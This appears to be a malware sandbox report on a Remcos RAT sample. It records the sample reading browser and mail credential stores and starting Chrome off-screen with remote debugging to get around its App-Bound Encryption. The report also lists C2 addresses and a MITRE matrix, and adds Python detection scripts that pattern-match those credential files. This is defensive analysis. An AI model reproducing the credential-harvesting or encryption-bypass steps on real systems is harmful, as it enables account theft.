Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | Code function 10_2_004033F0: ESMTPPassword
Source: C:\Windows\SysWOW64\msiexec.exe | Code function 10_2_00402DB3: _mbscpy, _mbscpy, _mbscpy, _mbscpy, PopPassword
Source: C:\Windows\SysWOW64\msiexec.exe | Code function 10_2_00402DB3: _mbscpy, _mbscpy, _mbscpy, _mbscpy, SMTPPassword
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6196, type: MEMORYSTR
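The file-open lines above are the footprint of a browser and mail credential grabber running inside a process that has no business touching those files (here msiexec.exe, which hosts the Remcos payload). The Python below is an added example for this report, not Joe Sandbox or Remcos code: it runs an owner-mismatch check over file-access events, flagging any credential-bearing file opened by something other than the browser that owns it. The event field names (Image, ProcessId, TargetFilename, in the style of an EDR file-access event), the owner mapping, the PID 5024 pairing and the benign events are assumptions constructed for the example; the ten msiexec.exe targets are the paths listed above.

```python
"""Owner-mismatch check for browser and mail credential stores.

Added example for this report (not Joe Sandbox or Remcos code). It walks
file-access events and flags any credential-bearing file opened by a process
other than the browser that owns it. Field names and the benign events are
assumptions constructed for the example.
"""
import re
from pathlib import PureWindowsPath

# Credential-bearing files and the image that legitimately owns each.
# logins.json is added as a known Firefox store; the rest are the files the
# report shows msiexec.exe opening. The owner set is an assumption to tune
# per estate (backup agents, sync helpers and DLP scanners also read these).
CREDENTIAL_STORES = [
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(key4\.db|logins\.json|cookies\.sqlite|places\.sqlite)$", re.I),
     {"firefox.exe"}),
    (re.compile(r"\\Mozilla\\Firefox\\profiles\.ini$", re.I), {"firefox.exe"}),
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\(Login Data|Web Data|Network\\Cookies|Secure Preferences)$", re.I),
     {"chrome.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\[^\\]+\\(Login Data|Web Data|Network\\Cookies)$", re.I),
     {"msedge.exe"}),
]


def classify(event):
    """Return a finding for a cross-process credential-store read, else None."""
    image = PureWindowsPath(event["Image"]).name.lower()
    target = event["TargetFilename"]
    for pattern, owners in CREDENTIAL_STORES:
        if pattern.search(target):
            # the owning browser reading its own profile is normal
            return None if image in owners else {
                "pid": event["ProcessId"], "image": image, "file": target}
    return None


def triage(events):
    """Group findings per process: one RAT touching ten files is one alert."""
    by_proc = {}
    for event in events:
        finding = classify(event)
        if finding:
            by_proc.setdefault((finding["pid"], finding["image"]), []).append(finding["file"])
    return by_proc


# Constructed events. The ten msiexec.exe targets are the paths from the report;
# PID 5024 is the Yara-matched msiexec.exe PID above (the report does not say
# which msiexec.exe instance opened each file, so the pairing is an assumption).
_RAT = r"C:\Windows\SysWOW64\msiexec.exe"
_FF = r"C:\Users\user\AppData\Roaming\Mozilla\Firefox"
_CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
_EDGE = r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default"
SAMPLE_EVENTS = [
    {"Image": _RAT, "ProcessId": 5024, "TargetFilename": t} for t in (
        _FF + r"\Profiles\ol7uiqa8.default-release\cookies.sqlite",
        _FF + r"\Profiles\ol7uiqa8.default-release\places.sqlite",
        _FF + r"\Profiles\ol7uiqa8.default-release\key4.db",
        _FF + r"\profiles.ini",
        _EDGE + r"\Login Data",
        _EDGE + r"\Network\Cookies",
        _CHROME + r"\Web Data",
        _CHROME + r"\Login Data",
        _CHROME + r"\Network\Cookies",
        _CHROME + r"\Secure Preferences",
    )
] + [
    # benign: browsers reading their own profiles, msiexec touching an installer
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "ProcessId": 4100,
     "TargetFilename": _CHROME + r"\Login Data"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "ProcessId": 4200,
     "TargetFilename": _FF + r"\Profiles\ol7uiqa8.default-release\key4.db"},
    {"Image": _RAT, "ProcessId": 5024, "TargetFilename": r"C:\Windows\Installer\1a2b3c.msi"},
]

if __name__ == "__main__":
    for (pid, image), files in triage(SAMPLE_EVENTS).items():
        print(f"ALERT {image} pid {pid} read {len(files)} credential stores:")
        for f in files:
            print("   ", f)
```

Grouping by process matters in practice: the same msiexec.exe instance opens all ten stores within seconds, and one alert carrying the full list is far easier to act on than ten separate ones. The owner sets are the part to tune; the path patterns themselves rarely need changing.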

              Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HMKDWQ
Source: Yara match | File source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
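Chrome's Application-Bound Encryption keeps the key for the cookie and password stores out of reach of a process that merely reads the files, so the payload instead starts Chrome itself with --remote-debugging-port=9222, a throwaway --user-data-dir under Temp and the window pushed off-screen, and reads the already-decrypted data over the DevTools protocol. The command line recorded above has every one of those tells. The Python below is an added example for this report, not Joe Sandbox or Remcos code: it scores a process-creation event on those switches and on the parent process. The event field names (ParentImage, Image, CommandLine, in the style of Sysmon Event ID 1), the list of expected parent images, the -1000 pixel threshold and the two benign events are assumptions for the example; the first event's command line and parent image are taken from the report.

```python
"""Score a Chrome launch for the remote-debugging App-Bound Encryption bypass.

Added example for this report (not Joe Sandbox or Remcos code). A stealer that
cannot decrypt Chrome's cookie/password stores on disk starts Chrome itself with
remote debugging enabled, a throwaway profile and the window off-screen, then
pulls the decrypted data over DevTools. Field names (Sysmon Event ID 1 style),
the expected-parent list and the thresholds are assumptions for the example.
"""
import re
from pathlib import PureWindowsPath

# Images that normally start a browser. Assumption: tune for the estate.
EXPECTED_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "brave.exe"}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
OFFSCREEN_PX = -1000  # a window this far left/up of the origin is hidden on purpose


def parse_switches(cmdline):
    """Map every --switch[=value] token of a Chromium command line to its value."""
    switches = {}
    for tok in re.findall(r'"[^"]*"|\S+', cmdline):
        tok = tok.strip('"')
        if not tok.startswith("--"):
            continue                      # the image path and positional URLs
        name, sep, value = tok[2:].partition("=")
        switches[name] = value.strip('"') if sep else None
    return switches


def assess(event):
    """Return the indicators found and whether together they warrant an alert."""
    sw = parse_switches(event["CommandLine"])
    indicators = []
    if "remote-debugging-port" in sw or "remote-debugging-pipe" in sw:
        indicators.append("remote-debugging")
    udd = sw.get("user-data-dir")
    if udd and TEMP_DIR.search(udd):
        indicators.append("temp-user-data-dir")
    pos = sw.get("window-position") or ""
    coords = [int(c) for c in pos.split(",") if c.lstrip("-").isdigit()]
    if any(c < OFFSCREEN_PX for c in coords):
        indicators.append("offscreen-window")
    if "headless" in sw:
        indicators.append("headless")
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    if parent not in EXPECTED_PARENTS:
        indicators.append("non-browser-parent")
    # Remote debugging alone is a developer workflow; it becomes an alert once
    # combined with any sign of hiding the window, staging a throwaway profile
    # or being spawned by something that is neither a browser nor the shell.
    alert = "remote-debugging" in indicators and len(indicators) >= 2
    return {"indicators": indicators, "alert": alert}


# Constructed events. The first carries the command line and parent recorded in
# this report; the other two are benign launches made up for contrast.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
REPORT_EVENT = {
    "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe",
    "Image": CHROME,
    "CommandLine": CHROME + r" --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData"
                   r" --window-position=-2400,-2400 --remote-debugging-port=9222"
                   r' --profile-directory="Default"',
}
DEV_EVENT = {  # developer attaching DevTools to a normal profile
    "ParentImage": r"C:\Windows\explorer.exe",
    "Image": CHROME,
    "CommandLine": f'"{CHROME}" --remote-debugging-port=9222',
}
NORMAL_EVENT = {
    "ParentImage": r"C:\Windows\explorer.exe",
    "Image": CHROME,
    "CommandLine": f'"{CHROME}" --profile-directory=Default',
}

if __name__ == "__main__":
    for name, ev in (("report", REPORT_EVENT), ("dev", DEV_EVENT), ("normal", NORMAL_EVENT)):
        r = assess(ev)
        print(f"{name:7} alert={r['alert']!s:5} indicators={r['indicators']}")
```

A developer who starts Chrome with remote debugging from cmd.exe or a PowerShell prompt will trip the parent check; add those shells to EXPECTED_PARENTS for developer hosts rather than dropping the check, because a non-browser parent such as msiexec.exe is the strongest single signal in the recorded event.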
MITRE ATT&CK Matrix

The report's 14-column matrix was flattened in the source; it is reconstructed here one tactic per line. A number in parentheses is the signature-count badge shown next to that technique in the report, reproduced as it appears; techniques without a number carried no badge.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (1); Native API (11); Command and Scripting Interpreter (12); PowerShell (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Extra Window Memory Injection (1); Access Token Manipulation (1); Process Injection (412); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Extra Window Memory Injection (1); Masquerading (11); Modify Registry (1); Virtualization/Sandbox Evasion (11); Access Token Manipulation (1); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); Network Service Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (28); Security Software Discovery (231); Virtualization/Sandbox Evasion (11); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1); System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Data from Local System (1); Input Capture (11); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (2); Non-Application Layer Protocol (3); Application Layer Protocol (14); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph

Graph ID 1553438; sample rPO3799039985.exe; start date 11/11/2024; architecture WINDOWS; score 100. The graph image is not reproduced; its legend distinguished node types for Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious and Internet. The node contents follow as a process tree; numbers in square brackets are the count badges shown next to a process in the graph (created registry values / files), reproduced as given.

Analysis root
  Network: svc.ms-acdc-teams.office.com; svc.ha-teams.office.com; 11 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 7 other signatures
  • rPO3799039985.exe [21]
      Dropped: C:\Users\user\...\Martyrization.Pra121 (ASCII)
      Signature: Suspicious powershell command line found
      • powershell.exe [28]
          Dropped: C:\Users\user\AppData\...\rPO3799039985.exe (PE32); C:\...\rPO3799039985.exe:Zone.Identifier (ASCII)
          Signatures: Early bird code injection technique detected; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 5 other signatures
          • msiexec.exe [10, 31]
              Network: 87.120.114.20, ports 49769, 49770, 49771 (UNACS-AS-BG8000BurgasBG, Bulgaria); filetransfer.io 104.21.13.139, ports 443, 49767 (CLOUDFLARENETUS, United States); 3 other IPs or domains
              Dropped: C:\ProgramData\remcos\logs.dat (data)
              Signatures: Detected Remcos RAT; Attempt to bypass Chrome Application-Bound Encryption; Tries to steal Mail credentials (via file registry); 3 other signatures
              • msiexec.exe [14]
                  Signature: Tries to harvest and steal browser information (history, passwords, etc)
              • msiexec.exe [1]
              • chrome.exe
                  Network: 192.168.11.20, ports 137, 138, 1900 (unknown, unknown); 239.255.255.250, port 1900 (unknown, Reserved)
                  • chrome.exe
                      Network: googlehosted.l.googleusercontent.com 172.217.215.132, ports 443, 49781 (GOOGLEUS, United States); clients2.googleusercontent.com
              • 3 other processes
                  Dropped: C:\Users\user\AppData\...\download_cache (COM); C:\Users\user\AppData\Local\Temp\...\cache (COM)
                  • msedge.exe
                  • conhost.exe
                  • reg.exe [1, 1]
          • conhost.exe
  • msedge.exe [23, 162]
      Signature: Maps a DLL or memory area into another process
      • msedge.exe
          Network: dns.quad9.net 149.112.112.112, ports 443, 55810, 59315 (QUAD9-AS-1US, United States); svc.ms-acdc-teams.office.com 52.123.251.14, ports 443, 63505 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); 2 other IPs or domains
      • identity_helper.exe
      • identity_helper.exe

Antivirus Detection

Sample (Source | Detection | Scanner):
rPO3799039985.exe | 18% | Virustotal
rPO3799039985.exe | 8% | ReversingLabs

Dropped files (Source | Detection | Scanner):
C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\rPO3799039985.exe | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\cache | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\download_cache | 0% | ReversingLabs

No Antivirus matches

Domains (Source | Detection | Scanner):
s20.filetransfer.io | 0% | Virustotal

URLs (Source | Detection | Scanner | Label):
https://unitedstates1.ss.wd.microsoft.us-1001 | 0% | Avira URL Cloud | safe
https://publickeyservice.gcp.privacysandboxservices.com | 0% | Avira URL Cloud | safe
http://unisolated.invalid/ | 0% | Avira URL Cloud | safe
http://www.imvu.comr | 0% | Avira URL Cloud | safe
http://crbug.com/1165751 | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe
http://www.imvu.comata | 0% | Avira URL Cloud | safe
http://crbug.com/1165751 | 0% | Virustotal |
https://crbug.com/593024 | 0% | Avira URL Cloud | safe
https://drive-daily-2.corp.google.com/ | 0% | Avira URL Cloud | safe
https://issuetracker.google.com/349489248 | 0% | Avira URL Cloud | safe
https://s20.filetransfer.io/W | 0% | Avira URL Cloud | safe
https://drive-daily-1.corp.google.com/ | 0% | Avira URL Cloud | safe
https://drive-daily-5.corp.google.com/ | 0% | Avira URL Cloud | safe
http://nsis.sf.net/NSIS_Error | 0% | Avira URL Cloud | safe
http://anglebug.com/4722 | 0% | Avira URL Cloud | safe
http://anglebug.com/1452 | 0% | Avira URL Cloud | safe
https://drive-preprod.corp.google.com/ | 0% | Avira URL Cloud | safe
https://s20.filetransfer.io// | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png4 | 0% | Avira URL Cloud | safe
http://anglebug.com/5007 | 0% | Avira URL Cloud | safe
Domains and IPs

Name | IP | Active | Malicious | Antivirus detection | Reputation
svc.ms-acdc-teams.office.com | 52.123.251.14 | true | false | - | high
chrome.cloudflare-dns.com | 172.64.41.3 | true | false | - | high
geoplugin.net | 178.237.33.50 | true | false | - | high
dns.quad9.net | 149.112.112.112 | true | false | - | high
sb.scorecardresearch.com | 3.163.101.92 | true | false | - | high
filetransfer.io | 104.21.13.139 | true | false | - | high
s20.filetransfer.io | 172.67.200.96 | true | false | - | unknown
googlehosted.l.googleusercontent.com | 172.217.215.132 | true | false | - | high
clients2.googleusercontent.com | unknown | unknown | false | - | high
assets.msn.com | unknown | unknown | false | - | high
c.msn.com | unknown | unknown | false | - | high
deff.nelreports.net | unknown | unknown | false | - | high
ntp.msn.com | unknown | unknown | false | - | high
api.msn.com | unknown | unknown | false | - | high
URLs

Name | Source | Malicious | Antivirus detection | Reputation
https://duckduckgo.com/chrome_newtab | chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmp; Web Data.17.dr | false | - | high
https://mail.google.com/mail/?usp=installed_webapp | chrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144265218991.000012AC01304000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search | Web Data.17.dr | false | - | high
http://www.imvu.comr | msiexec.exe, 00000004.00000002.148901845750.0000000021E20000.00000040.10000000.00040000.00000000.sdmp; msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | Web Data.17.dr | false | - | high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing | chrome.exe, 00000008.00000002.144256128104.000012AC00120000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144257598930.000012AC003E0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://unitedstates1.ss.wd.microsoft.us-1001 | msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://uk.search.yahoo.com/search?ei=&fr=crmas&p= | chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b | chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://docs.google.com/document/J | chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/ | chrome.exe, 00000008.00000002.144261441489.000012AC00BC0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://shop.advanceautoparts.com/web/OrderItemDisplay | chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.nirsoft.net | msiexec.exe, 00000009.00000002.144189871263.0000000002E8F000.00000004.00000010.00020000.00000000.sdmp | false | - | high
https://aefd.nelreports.net/api/report?cat=bingaotak | Reporting and NEL.20.dr | false | - | high
https://deff.nelreports.net/api/report?cat=msn | Reporting and NEL.20.dr | false | - | high
https://aefd.nelreports.net/api/report?cat=bingcsp | Reporting and NEL.20.dr | false | - | high
http://dns-tunnel-check.googlezip.net/connect | chrome.exe, 00000008.00000002.144263008450.000012AC00EC8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://publickeyservice.gcp.privacysandboxservices.com | chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/ | chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://docs.google.com/document/: | chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.therealreal.com/cart | chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=enWeb | chrome.exe, 00000008.00000002.144259219060.000012AC00770000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://publickeyservice.pa.aws.privacysandboxservices.com | chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.shutterfly.com/cart/ | chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.urbanoutfitters.com/cart | chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.saksfifthavenue.com/cart | chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.zappos.com/cart | chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.guitarcenter.com/cart | chrome.exe, 00000008.00000002.144259430093.000012AC007B3000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crbug.com/1165751 | msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp; msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://unisolated.invalid/ | chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | chrome.exe, 00000008.00000002.144263189888.000012AC00F20000.00000004.00000800.00020000.00000000.sdmp; Web Data.17.dr | false | - | high
https://www.altardstate.com/cart/ | chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://drive.google.com/?lfhs=2 | chrome.exe, 00000008.00000002.144265313357.000012AC0134C000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144265403166.000012AC01398000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144264933828.000012AC01280000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.adorama.com/als.mvc/cartview | chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.bedbathandbeyond.com/store/cart | chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.bestbuy.com/cart | chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.ikea.com/us/en/shoppingcart/ | chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.imvu.comata | msiexec.exe, 0000000B.00000003.144170842635.00000000031AD000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 0000000B.00000003.144170955946.00000000031AD000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 0000000B.00000003.144171023674.00000000031AD000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 0000000B.00000002.144172323389.00000000031AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.144019020175.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/chrome/browser-tools/ | chrome.exe, 00000008.00000002.144261607698.000012AC00C14000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.williams-sonoma.com/shoppingcart/ | chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.com/ | msiexec.exe, 0000000B.00000002.144171415973.0000000002CCC000.00000004.00000010.00020000.00000000.sdmp | false | - | high
https://crbug.com/593024 | chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000003.144233363066.000012AC00CE0000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp; msedge.exe, 0000000F.00000002.144316646821.000064280043C000.00000004.00000800.00020000.00000000.sdmp; msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp; msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmp | false |
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://docs.google.com/presentation/chrome.exe, 00000008.00000002.144265403166.000012AC01398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144265017944.000012AC012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264857051.000012AC01250000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://duckduckgo.com/?q=chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://chrome.google.com/webstorechrome.exe, 00000008.00000002.144256031394.000012AC000F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144315499677.0000642800170000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
